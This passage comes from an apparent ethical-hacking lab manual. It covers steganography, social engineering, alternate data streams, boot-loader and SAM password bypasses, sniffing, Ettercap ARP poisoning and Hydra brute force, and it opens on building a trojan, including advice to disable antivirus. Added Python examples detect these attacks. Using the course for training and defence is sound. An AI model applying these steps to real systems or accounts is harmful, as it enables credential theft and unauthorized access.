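Added example, not part of the lab manual. SAMPLE_WALK is constructed to
follow the snmpwalk output format shown above; no SNMP request is sent.
"""
import re

# Constructed sample of what `snmpwalk -c public -v1 <host> 1` might print.
SAMPLE_WALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 Model 4 Stepping 8 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "System Idle Process"
HOST-RESOURCES-MIB::hrSWRunName.8 = STRING: "System"
HOST-RESOURCES-MIB::hrSWRunName.168 = STRING: "smss.exe"
HOST-RESOURCES-MIB::hrSWRunName.1084 = STRING: "snmp.exe"
TCP-MIB::tcpConnState.0.0.0.0.21.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.25.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.80.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.192.168.0.110.80.192.168.0.5.1042 = INTEGER: established(5)
SNMPv2-SMI::enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
"""

# <oid> = <TYPE>: <value>
LINE_RE = re.compile(r"^(?P<oid>\S+) = (?P<type>[A-Za-z0-9-]+): ?(?P<value>.*)$")


def parse_walk(text):
    """Return a list of (oid, type, value); STRING values lose their quotes."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation lines of multi-line values are skipped
        oid, typ, val = m.group("oid"), m.group("type"), m.group("value")
        if typ == "STRING" and len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]
        rows.append((oid, typ, val))
    return rows


def system_description(rows):
    for oid, _, val in rows:
        if oid.endswith("::sysDescr.0"):
            return val
    return None


def running_processes(rows):
    """hrSWRunName.<pid> -> {pid: name}; the manual's `cut -d" " -f4` keeps only the name."""
    procs = {}
    for oid, _, val in rows:
        if "::hrSWRunName." in oid:
            procs[int(oid.rsplit(".", 1)[1])] = val
    return procs


def listening_tcp_ports(rows):
    """The tcpConnState index is localAddr(4 parts).localPort.remAddr(4).remPort,
    so the local port is the fifth index component; `cut -d"." -f6` in the
    manual lands on the same field because the first dot-field is the MIB name."""
    ports = set()
    for oid, _, val in rows:
        if "::tcpConnState." in oid and val.startswith("listen"):
            index = oid.split("::tcpConnState.", 1)[1].split(".")
            ports.add(int(index[4]))
    return sorted(ports)


def windows_users(rows):
    """enterprises.77.1.2.25 is the LAN Manager MIB user table. Its index is the
    user name itself, encoded as <length>.<byte>.<byte>..., so the name can be
    decoded from the OID and compared with the quoted value the manual greps.
    Returns (name_from_oid, quoted_value) pairs."""
    users = []
    for oid, _, val in rows:
        if ".77.1.2.25." not in oid:
            continue
        tail = oid.split(".77.1.2.25.", 1)[1].split(".")
        length = int(tail[2])  # tail[0:2] are the entry and column sub-ids
        from_oid = "".join(chr(int(b)) for b in tail[3:3 + length])
        users.append((from_oid, val))
    return users
```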
Steganography: Hiding Data within Data
Objectives: At the end of this module you should be able to:
Understand steganography to hide data in images.
Comfortably use tools like Image Hide, Invisible Secrets etc.
Description:
Steganography is the technique of writing hidden information within images, audio or video. The word
steganography is of Greek origin and means "concealed writing". This technique is used by hackers, terrorists etc. to
communicate with each other without being caught, and the technique makes sure that the data is well hidden.
There are many techniques in use, but the most famous or commonly used one is hiding data in an image file.
We will see how it is actually done.
We will be using software known as Invisible Secrets 2.1.
PART 1 (HIDING DATA)
Step 1: Install the software and run it
Step 2: Click on next.
Step 3:
Select the option as shown above and click on next
Step 4:
Select the image in which you want to hide data. Above I have selected an image, original.jpg. Then click on next.
Step 5:
Click on Add Files and select the file which you want to hide in the picture. As you can see above, I have selected a text file, "This is secret.txt". You can also select multiple files. After selecting, click next.
Step 6:
You will have to provide an encryption password, then click next.
Step 7:
Now give the target file a name; this file will contain your hidden text. As you can see above I have named it "stenoimage". Now click on next.
Step 8:
As you can see, a new image file has been created with the name "stenoimage". It is the same as the original file with no changes, or is it?
Click on next and then on the next window click finish.
So far we have managed to hide a text file in an image. In the next part we will extract the hidden data.
EXTRACTING HIDDEN DATA FROM THE IMAGE
Step 1:
Well after clicking on finish you will end up on this screen.
This time select the 2nd option to extract the secret data from the image. Click on next.
Step 2:
Select the image from which you want to extract the hidden file, in our case "stenoimage.jpg", then click on next.
Step 4: Input the password that you provided earlier.
As you can see above, that's our secret file. Now choose the location where you want to extract it and click on next, and your secret file will be visible.
Exercises
i. Try to extract text from a picture without using steganography tools.
Module Four: Social Engineering
Objectives:
• Social engineering concepts
• Categories of social engineering
• Techniques for social engineering
• Approach
• Scenarios
• Best practices
• Summary
Social Engineering Concepts:
Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on
human interaction, tricking people into breaking normal security procedures. Social engineering is generally
a hacker's clever manipulation of the natural human tendency to trust. The hacker's goal is to obtain
information that will allow him/her to gain unauthorized access to a valued system and the
information that resides on that system.
Social Engineering Categories:
• Human based social engineering
– Telephonic
– Persuasion
– Dumpster diving
– Shoulder surfing
• Technology based social engineering
– Phishing
– Misleading programs
– Spoofed mails/Spam
Human Based Social Engineering
Social engineering at the human level generally exploits trust and face-to-face
interaction. Social engineering at the psychological level can take place at multiple levels:
Gaining sympathy
Playing games (I am ok You are ok)
Manipulating thoughts
Giving an impression
Calculated inducement of feelings over time
Exploiting factors like above to reach an objective.
Using Technology for Social Engineering
Hackers use a variety of techniques to social engineer using technology:
Masquerading as a customer in a support chat for assistance
Sending fake e-mails containing bogus product queries
Sending links to fake websites
Phishing common websites of interest
Creating fake blogs with misleading news/information
Creating fake profiles in social networking sites like Orkut
Cheating people by pretending to be a helpless girl on chat and asking for money (cyber-begging)
Pretending to be a customer support engineer
Social Engineering by Phone
The most prevalent type of social engineering attack is conducted by phone.
Help desks are particularly prone to this type of attack.
Hackers are able to pretend they are calling from inside the corporation by playing tricks on
the PBX or the company operator.
Help desks are particularly vulnerable because they are in place specifically to help.
Dumpster Diving
Dumpster diving, also known as trashing, is another popular method of social engineering.
A huge amount of information can be collected through company dumpsters.
The information can be company phone books, organizational charts, company policy
manuals, events and vacations, system manuals, printouts of sensitive data or login names
and passwords, printouts of source code, disks and tapes, company letterhead and outdated
hardware.
Module Five: Taking on the system
NTFS Alternate Streams:
Objectives: At the end of this module you should be able:
To create and read alternate data streams.
To hide different files using the ADS technique.
Description:
NTFS streams, or Alternate Data Streams, are a feature only available in the NT file system. Using this
feature any file of any length can be hidden under another file, such that the true properties of the
hidden file are never shown to the user.
Unlike the Hidden attribute available from the Properties tab of a file, an ADS can be used to completely
hide the file from the file system.
Streams are not limited in size and there can be more than one stream linked to a file.
Creating an NTFS stream:
To retrieve the hidden file contents:
Hidden.txt file is not visible
Alternate data streams can further be used in creating malware, which may use a simple batch
script (such as the one shown after the boot-loader steps below) that automatically creates an ADS file.
Physical Access Attacks:
Objectives: At the end of this module you should be able to:
Reset Windows Passwords.
Reset Linux Passwords.
Reset Linux Passwords:
Description:
A Linux machine can be made to boot as the root user if we can modify the boot loader at the start of the
machine. Linux may use either the LILO or the GRUB boot loader to boot the operating system.
Either boot loader will allow us to modify the boot options, where we can choose to boot into
single user mode.
Booting into Linux single user mode:
At the boot loader, instead of selecting the OS to boot, type the letter 'e' to edit the line before booting.
Ubuntu by default gives you an option to boot into recovery mode, where a root shell can be
dropped into.
The boot loader will then present you with a screen to edit the kernel boot options, where these
changes are to be made.
The batch file referred to in the NTFS Alternate Streams section above, which opens a named stream of a file through a temporary link:
@ECHO OFF
REM This batch file starts or opens a
REM stream. Call with first param as filename
REM and second param as stream name
MKLINK temp_%2 %1:%2
START temp_%2
DEL temp_%2
Find the line which starts with the word linux and append the word single to it.
(OR)
Append init=/bin/bash to the line.
Once the changes are done, type 'b' (or in some cases press CTRL + X) to boot with the changes.
Reset Windows Passwords:
Windows stores local usernames in the Security Accounts Manager (SAM) database as well as in other
places. Please read the following article if you are not familiar with the SAM:
http://www.microsoft.com/technet/archive/winntas/tips/winntmag/storpass.mspx?mfr=true
The SAM file can be found in %SYSTEMROOT%\system32\config and is inaccessible for reading,
copying, or writing while Windows is running. The solution is to reboot the system with a live OS, which
makes the file system readable.
In this example we will be looking at a tool called chntpw, which is used to modify the contents of the SAM
file.
Using chntpw
Instructions for using chntpw:
Boot the Windows machine from a live OS like Backtrack.
Mount the file system which contains the installed operating system.
Give the path of the SAM file to chntpw.
The tool will prompt whether to change the password or blank it.
Choose your desired option and the tool will save accordingly.
Reboot the machine into Windows; you should be able to log in without any difficulties.
This screenshot shows modifying of a sample SAM and system file.
TCPDUMP (Network Analyzers)
Objectives: At the end of this module you should be able:
To intercept data from networks and monitor it.
To filter the necessary packets.
Description:
Network analyzers are used to monitor packet data in a network for the purpose of troubleshooting
network related problems. However, in the field of security these tools and techniques have greater
importance as they can be used to compromise the security of network and systems.
Basic Usage
Based on the kind of traffic we are looking for, we can use a different combination of options to
tcpdump, as can be seen below:
1. Basic communication // see the basics without many options
# tcpdump -nS
2. Basic communication (very verbose) // see a good amount of traffic, with verbosity and no name help
# tcpdump -nnvvS
3. A deeper look at the traffic // adds -X for payload but doesn't grab any more of the packet
# tcpdump -nnvvXS
4. Heavy packet viewing // the final "s" increases the snap length, grabbing the whole packet
# tcpdump -nnvvXSs 1514
Here's a capture of exactly two (-c2) ICMP packets (a ping and pong) using some of the options
described above. Notice how much we see about each packet.
Common Syntax
Expressions allow you to trim out various types of traffic and find exactly what you're looking for.
Mastering the expressions and learning to combine them creatively is what makes one truly powerful
with tcpdump.
root # tcpdump -nnvXSs 0 -c2 icmp
tcpdump: listening on eth0, link-type EN10MB (Ethernet),
23:11:10.370321 IP (tos 0x20, ttl 48, id 34859, offset 0, flags [none], length: 84) 69.254.213.43 > 72.21.34.42: icmp 64: echo request seq 0
    0x0000: 4520 0054 882b 0000 3001 7cf5 45fe d52b  E..T.+..0.|.E..+
    0x0010: 4815 222a 0800 3530 272a 0000 25ff d744  H."*..50'*..%..D
    0x0020: ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
    0x0030: 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
    0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
    0x0050: 3435 3637                                4567
23:11:10.370344 IP (tos 0x20, ttl 64, id 35612, offset 0, flags [none], length: 84) 72.21.34.42 > 69.254.213.43: icmp 64: echo reply seq 0
    0x0000: 4520 0054 8b1c 0000 4001 6a04 4815 222a  E..T....@.j.H."*
    0x0010: 45fe d52b 0000 3d30 272a 0000 25ff d744  E..+..=0'*..%..D
    0x0020: ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
    0x0030: 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
    0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
    0x0050: 3435 3637                                4567
2 packets captured
2 packets received by filter
0 packets dropped by kernel
root #
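The -X hex dump above is the raw packet, and every field in tcpdump's summary line can be read back out of it. The Python below is an added example, not part of the manual or of tcpdump: it decodes the echo-request packet from the capture above (hex columns only, ASCII column removed) into its IPv4 and ICMP header fields, verifies both checksums, and rebuilds the summary line, which is a quick way to confirm a dump pasted into a report is intact.

```python
"""Decode the IPv4 and ICMP headers out of a `tcpdump -X` hex dump.

Added example, not part of the manual or of tcpdump. ECHO_REQUEST_HEX is the
echo-request packet from the capture above with its ASCII column removed;
decoding it shows where each field of tcpdump's summary line comes from, and
the checksum routine tells you whether a dump pasted into a report is intact.
"""
import socket
import struct

ECHO_REQUEST_HEX = """\
0x0000: 4520 0054 882b 0000 3001 7cf5 45fe d52b
0x0010: 4815 222a 0800 3530 272a 0000 25ff d744
0x0020: ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213
0x0030: 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223
0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233
0x0050: 3435 3637
"""

HEXDIGITS = set("0123456789abcdefABCDEF")


def hexdump_to_bytes(dump):
    """Collect the 4-hex-digit groups after each 'offset:' into bytes.
    Strip tcpdump's ASCII column first: it can itself look like hex (the last
    line of the capture above ends in the printable bytes '4567')."""
    out = bytearray()
    for line in dump.strip().splitlines():
        _, sep, rest = line.partition(":")
        if not sep:
            continue
        for tok in rest.split():
            if len(tok) == 4 and set(tok) <= HEXDIGITS:
                out += bytes.fromhex(tok)
            else:
                break  # anything else is the ASCII column
    return bytes(out)


def internet_checksum(data):
    """RFC 1071 one's-complement sum; a header with a valid checksum sums to 0xFFFF."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def decode_ipv4_icmp(pkt):
    """Return the IPv4 header fields and, for protocol 1, the ICMP header."""
    (ver_ihl, tos, total_len, ident, frag, ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    info = {
        "version": ver_ihl >> 4, "ihl": ihl, "tos": tos, "length": total_len,
        "id": ident, "df": bool(frag & 0x4000), "mf": bool(frag & 0x2000),
        "offset": (frag & 0x1FFF) * 8, "ttl": ttl, "proto": proto,
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "ip_checksum_ok": internet_checksum(pkt[:ihl]) == 0xFFFF,
    }
    if proto == 1:
        icmp = pkt[ihl:total_len]
        itype, code, _icsum, icmp_id, seq = struct.unpack("!BBHHH", icmp[:8])
        info["icmp"] = {
            "type": itype, "code": code, "id": icmp_id, "seq": seq,
            "kind": {8: "echo request", 0: "echo reply"}.get(itype, "type %d" % itype),
            "checksum_ok": internet_checksum(icmp) == 0xFFFF,  # covers header + payload
        }
    return info


def summarize(info):
    """Rebuild the one-line summary tcpdump printed for the packet."""
    flags = [name for name, on in (("DF", info["df"]), ("+", info["mf"])) if on]
    line = "IP (tos 0x%02x, ttl %d, id %d, offset %d, flags [%s], length: %d) %s > %s" % (
        info["tos"], info["ttl"], info["id"], info["offset"],
        ", ".join(flags) or "none", info["length"], info["src"], info["dst"])
    if "icmp" in info:
        line += ": icmp %d: %s seq %d" % (
            info["length"] - info["ihl"], info["icmp"]["kind"], info["icmp"]["seq"])
    return line
```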
There are three main types of expression: type, dir, and proto.
Type options are host, net, and port. Direction is indicated by dir, and there you can have src, dst, src
or dst, and src and dst. Here are a few that you should definitely be comfortable with:
host // look for traffic based on IP address (also works with hostname if you're not using -n)
# tcpdump host 1.2.3.4
src, dst // find traffic from only a source or destination (eliminates one side of a host conversation)
# tcpdump src 2.3.4.5
# tcpdump dst 3.4.5.6
net // capture an entire network using CIDR notation
# tcpdump net 1.2.3.0/24
proto // works for tcp, udp, and icmp. Note that you don't have to type proto
# tcpdump icmp
port // see only traffic to or from a certain port
# tcpdump port 3389
src, dst port // filter based on the source or destination port
# tcpdump src port 1025
# tcpdump dst port 389
src/dst, port, protocol // combine all three
# tcpdump src port 1025 and tcp
# tcpdump udp and src port 53
You also have the option to filter by a range of ports instead of declaring them individually, and to
only see packets that are above or below a certain size.
Port Ranges // see traffic to any port in a range
# tcpdump portrange 21-23
Packet Size Filter // only see packets below or above a certain size (in bytes)
# tcpdump less 32
# tcpdump greater 128
[ You can also use the comparison symbols (<, >, <=, >=) on the packet length; quote the expression so
the shell does not treat the symbols as redirections. ]
// filtering for size using symbols
# tcpdump 'len > 32'
# tcpdump 'len <= 128'
Writing to a File
Tcpdump allows you to send what you're capturing to a file for later use using the -w option, and
then to read it back using the -r option. This is an excellent way to capture raw traffic and then run it
through various tools later.
Capture all Port 80 Traffic to a File
# tcpdump -s 1514 port 80 -w capture_file
Then, at some point in the future, you can then read the traffic back in like so:
Read Captured Traffic back into tcpdump
# tcpdump -r capture_file
Wireshark
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis,
software and communications protocol development, and education.
Steps to Use the program:
Capturing packets can be initiated by selecting the appropriate interface from the
interface list, as visible in the above picture.
Packets will be captured as soon as the interface is selected; the next image shows how the
packets are displayed to us.
Packet information can be viewed by double clicking on a specific packet.
Wireshark offers a great many filters which help sort out the packets that need to be viewed.
To apply a filter, type it into the filter box located below the menu bar. Pre-built expressions can also be
used; they can be accessed by clicking on Expressions beside the filter box.
As we can see above there are a large number of packets in this window. These can be recognized
by looking at the protocol column to know whether it is an HTTP, raw TCP, DNS or any other packet.
Wireshark makes it easy by color coding each protocol. The one in blue is a DNS packet and the green
one is a TCP or TCP-HTTP packet.
Since thousands of packets are being intercepted every second, it is a tedious job to
locate a particular packet among them. This is where the filter feature comes in handy.
Wireshark comes with a lot of built-in filters and also gives us the freedom to make our own filters.
For example, if we want to look at packets coming from a specific source address the filter would be
Filter: ip.src == 10.42.43.38
< More Examples >
Filter: ip.src == 10.42.43.38 && ip.dst == 10.42.43.1 (show packets from the source IP to the destination IP)
Filter: http (show only HTTP packets)
Filter: tcp || http (show TCP or HTTP packets, or both)
Apart from looking at the protocol information, the best feature of wireshark is that we can re-create
or see source of the entire webpage, binary or any other file that is being transmitted through the
network.
Following a Packet Sequence:
Click on the Follow TCP Stream as shown above to look for sequential packet information.
The Follow TCP Stream selection will land you in a window as shown below. This particular window will
show the combined output of all the packets selected by a particular filter; by default it takes the IP as the
filter and shows all data associated with it.
The information shown in red is the data received and the one in blue is the information being
sent to the server.
So by sniffing the network, any unencrypted information can be intercepted and viewed by the
above process. By using specific filters and combining the data gathered from the above windows we
can re-create the packet structure to make a binary file.
Exercises:
• Try to capture only HTTP packets using tcpdump/wireshark.
• Capture the packets containing Login credentials of a website.
• Try to capture packets from a chat messenger/irc chat.
Arp Spoofing (Ettercap)
Objectives: At the end of this module you should be able:
To attack the ARP protocol and capture all outgoing and incoming packets of a system.
To be comfortable using the Ettercap tool.
Description:
Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live
connections, content filtering on the fly and many other interesting tricks. It supports active
and passive dissection of many protocols and includes many features for network and host
analysis.
In order to poison an ARP cache, Ettercap first scans (Hosts->Scan for hosts) the entire netmask; clicking Hosts->Hosts then lists the active members of the network.
• On the Targets->Show Targets screen Ettercap shows the list of hosts; a target is selected by choosing its IP and clicking Add to Target.
• The attack is started by clicking MITM->Arp poisoning, as shown below.
• Click on Sniff remote connections when prompted to sniff packets from the victim machine.
• Once the ARP cache is poisoned, the captured packets can be viewed in any packet sniffer such as Wireshark.
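The defender's view of the attack just described, as an added example that is not part of the lab manual or of Ettercap: a check over a constructed stream of ARP replies that flags an IP-to-MAC binding that flips and a single MAC that starts answering for several IPs, which is what ARP poisoning looks like from the victim's side. The function name, the sample addresses and the alert format are my own.

```python
"""Spot ARP cache poisoning from observed ARP replies.

Added example, not part of the lab manual. The input is a constructed
list of ARP replies as (seconds, sender IP, sender MAC). During ARP
poisoning the attacking host answers for the gateway (and the victim),
so a binding that was stable suddenly flips and one MAC ends up
claiming several IP addresses.
"""
from collections import defaultdict

# Constructed sample. 192.168.1.1 is the gateway, 192.168.1.20 a victim
# and aa:bb:cc:dd:ee:ff a hypothetical attacker MAC that legitimately
# owns 192.168.1.50. Nothing here is captured from a real network.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1", "00:11:22:33:44:55"),
    (1.0, "192.168.1.50", "aa:bb:cc:dd:ee:ff"),
    (2.0, "192.168.1.20", "66:77:88:99:aa:bb"),
    (5.0, "192.168.1.1", "aa:bb:cc:dd:ee:ff"),   # gateway IP now claimed by attacker MAC
    (6.0, "192.168.1.20", "aa:bb:cc:dd:ee:ff"),  # victim IP re-bound as well
    (7.0, "192.168.1.1", "aa:bb:cc:dd:ee:ff"),   # poisoning is re-sent periodically
]


def detect_arp_poisoning(replies, max_ips_per_mac=1):
    """Return a list of alert tuples for suspicious ARP replies.

    Alert kinds:
      ("flip", ts, ip, first_mac, new_mac)  - the IP's MAC differs from the
                                              first binding seen for it
      ("multi", ts, mac, ips)               - the MAC now claims more than
                                              max_ips_per_mac distinct IPs
    The first binding seen for an IP is kept as the reference, so every
    later contradicting reply is reported (poisoning is usually repeated).
    """
    first_seen = {}                 # ip -> mac from the first reply
    claimed = defaultdict(set)      # mac -> set of ips it has answered for
    alerts = []
    for ts, ip, mac in replies:
        known = first_seen.setdefault(ip, mac)
        if known != mac:
            alerts.append(("flip", ts, ip, known, mac))
        before = len(claimed[mac])
        claimed[mac].add(ip)
        if len(claimed[mac]) > before and len(claimed[mac]) > max_ips_per_mac:
            alerts.append(("multi", ts, mac, tuple(sorted(claimed[mac]))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(alert)
```

On a real network the same logic can be fed from a static ARP table or from a switch's dynamic ARP inspection logs; hosts that legitimately own several IPs need a higher max_ips_per_mac.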
Arp Poisoning
Exercises:
• Perform an ARP attack on a local switch; this attack can result in total collapse of the
network. (You have been warned!!)
Module Six: Attacking passwords
PASSWORD HACKING:
Objectives: At the end of this module you should be able
To crack passwords using any of the three techniques: dictionary, brute-force and
hybrid attacks.
To crack MD5, NTLM passwords.
Description:
Password-based authentication is one of the weakest forms of user verification, the main reason being
that most times, the choice of the password is left to the user (which, as you know, is the weakest part
of the security chain).
Even if passwords are not user created (if, for instance, they are generated randomly), the security of the password is still left to the user. It is surprisingly common for users to write their password on a sticky note and keep it under their keyboard. Unfortunately, it seems that corporate policies are not capable of enforcing password security to a satisfying level.
HYDRA: Brute Force tool
As described by its authors, Hydra is the best-parallelized login hacker for Samba, FTP, POP3, IMAP,
Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco, and more. Hydra includes
SSL support and is part of Nessus. Hydra supports a huge number of protocols and is probably the
most well-known password brute force tool.
Type hydra in a BackTrack console to see the many Hydra command line options
FTP brute forcing with Hydra:
The above picture shows a successful HTTP password crack where
username = admin & password = P@ssword1
Open a console and type hydra. Use "-l" to give the user name if you are sure of it.
Use the "-P" option to give the word list (password list).
Finally give the target IP, followed by the protocol to attack (the run shown uses "-V" to print each attempt).
-e ns performs additional checks: "n" tries a null password, "s" tries the login as the password.
-t TASKS runs TASKS number of connects in parallel.
-f exits after the first found login/password pair.
-s PORT if the service is on a different default port, define it here.
-v/-V verbose mode / show login+password for each attempt.
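What a run like the one above looks like from the server side, as an added example that is not part of the lab manual or of Hydra: a detector over constructed authentication log lines that flags a burst of failed logins from one source inside a sliding window (the -t parallel connections) and a later success for the same source (the -f "first found pair" case). The log format, the function names and the sample addresses are my own.

```python
"""Detect a Hydra-style login brute force from authentication logs.

Added example, not part of the lab manual. Hydra runs many login
attempts in parallel (-t TASKS) against one user (-l) with a wordlist
(-P) and can stop at the first hit (-f). On the server that shows up
as a burst of failures from one source, often followed by a success
for the same account.

The log format below is constructed for this example and is not any
real daemon's format:
    <date> <time> ftpd: <FAILED|OK> LOGIN from <ip> user=<name>
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) ftpd: "
    r"(?P<result>FAILED|OK) LOGIN from (?P<ip>\S+) user=(?P<user>\S+)$"
)

# Constructed sample: a normal login, a burst from 10.0.0.5 against
# "admin" (seven failures in four seconds), one stray failure from
# another host, then a success for the brute-forced account.
SAMPLE_LOG = """\
2013-03-09 16:56:30 ftpd: OK LOGIN from 10.0.0.7 user=alice
2013-03-09 16:56:32 ftpd: FAILED LOGIN from 10.0.0.5 user=admin
2013-03-09 16:56:32 ftpd: FAILED LOGIN from 10.0.0.5 user=admin
2013-03-09 16:56:33 ftpd: FAILED LOGIN from 10.0.0.5 user=admin
2013-03-09 16:56:33 ftpd: FAILED LOGIN from 10.0.0.5 user=admin
2013-03-09 16:56:34 ftpd: FAILED LOGIN from 10.0.0.9 user=bob
2013-03-09 16:56:34 ftpd: FAILED LOGIN from 10.0.0.5 user=admin
2013-03-09 16:56:35 ftpd: FAILED LOGIN from 10.0.0.5 user=admin
2013-03-09 16:56:35 ftpd: FAILED LOGIN from 10.0.0.5 user=admin
2013-03-09 16:56:36 ftpd: OK LOGIN from 10.0.0.5 user=admin
"""


def parse_line(line):
    """Return (timestamp, result, ip, user) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
    return ts, m["result"], m["ip"], m["user"]


def detect_bruteforce(log_text, threshold=6, window_s=60):
    """Return alerts as dicts, in log order.

    kind="burst": a source IP reached `threshold` failed logins inside a
    sliding window of `window_s` seconds (reported once per IP).
    kind="success_after_burst": a later successful login from an IP that
    already triggered a burst alert, i.e. the guessing likely found a
    valid password.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue                # unrelated or malformed line
        ts, result, ip, user = rec
        if result == "FAILED":
            q = failures[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()         # drop failures older than the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"kind": "burst", "ip": ip, "user": user,
                               "at": ts.isoformat(sep=" "), "failures": len(q)})
        elif ip in flagged:
            alerts.append({"kind": "success_after_burst", "ip": ip,
                           "user": user, "at": ts.isoformat(sep=" ")})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```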
Using L0phtCrack to crack the hashes:
L0phtCrack is a password audit and recovery tool for Windows and Unix passwords.
L0phtCrack 6 provides two critical capabilities to system administrators:
● L0phtCrack 6 helps administrators secure Windows and Unix-authenticated networks through comprehensive auditing of Windows NT/2000/XP/2003/Vista/2008 and Unix user account passwords.
● L0phtCrack 6 recovers Windows and Unix user account passwords to streamline migration of users to another authentication system or to access accounts whose passwords are lost.
Importing hashes into L0phtCrack:
Step 1: Click on Import Hash, then select Import from PWDUMP file.
Step 2: Select your hash file and click OK.
Step 3: Click on Begin.
As you can see, L0phtCrack has cracked the hashes for us.
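Why a wordlist tool gets through so quickly, and what stops it, as an added example that is not part of the lab manual or of L0phtCrack: an unsalted hash (MD5 here; LM/NTLM share the property) is cracked by a lookup that is computed once and reused against every dump, whereas a per-user salt plus a slow key derivation (PBKDF2, from Python's standard library) gives every account a different value that no precomputed table covers. The wordlist, account names and function names are my own; "P@ssword1" is the password the Hydra run in this module recovered.

```python
"""Why unsalted hashes fall to wordlists, and the fix.

Added example, not part of the lab manual. A wordlist attack against an
unsalted hash is a lookup: hash every candidate once and compare. Two
users with the same password share one hash, and a table built once
serves every dump. A per-user random salt plus a slow KDF (PBKDF2 here)
removes both shortcuts while verification stays a one-liner.
"""
import hashlib
import hmac
import os

# Constructed wordlist; "P@ssword1" is the password the Hydra run
# in this module recovered.
WORDLIST = ["password", "letmein", "qwerty", "P@ssword1", "summer2013"]


def md5_hex(password):
    """Unsalted MD5 of a password: the weak scheme."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def build_lookup(words):
    """Precompute hash -> word once; reusable against any dump of unsalted hashes."""
    return {md5_hex(w): w for w in words}


def crack_unsalted(hashes, lookup):
    """Dictionary attack as a lookup: recover every hash present in the table."""
    return {h: lookup[h] for h in hashes if h in lookup}


def salted_hash(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, stored as one string."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_salted(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _alg, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo():
    """Two accounts with the same password under both schemes."""
    lookup = build_lookup(WORDLIST)
    weak = {"admin": md5_hex("P@ssword1"), "bob": md5_hex("P@ssword1")}
    strong = {"admin": salted_hash("P@ssword1"), "bob": salted_hash("P@ssword1")}
    return {
        "same_md5": weak["admin"] == weak["bob"],              # identical: one lookup hits both
        "cracked": crack_unsalted(weak.values(), lookup),      # recovered instantly
        "same_salted": strong["admin"] == strong["bob"],       # differ: salt is per user
        "salted_in_lookup": any(s in lookup for s in strong.values()),
        "admin_verifies": verify_salted("P@ssword1", strong["admin"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```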
Exercises:
i. Crack the Windows passwords by copying the SAM and SYSTEM files to a temporary location and use "Cain and Abel" to crack the passwords.
ii. Learn to use the John the Ripper password cracking tool.
iii. Crack the hash "28d2464b121f120a41f4cd5c496cae2c" (use all three types of password cracking and document the cracking procedure).
Module Seven: Malwares, Rootkits and Trojans
Objectives:
● To build a trojan using a trojan kit (Beast 2.07).
● To create a batch file virus.
Tools
● Beast (v2.07): This is a trojan building kit used to create trojans through a GUI.
● Notepad
● BAT to EXE converter
Beast
This is a powerful trojan building tool. It can be obtained from https://sites.google.com/site/trojandownloads/beast-2-07. However, this link was only known to work at the time of writing, and you may need to look for another.
Note: Your anti-virus program may flag this as a severe threat, as the trojan kit itself was released a couple of years back. To perform this demo successfully, you might have to disable your AV's protection mechanism.
Trojan
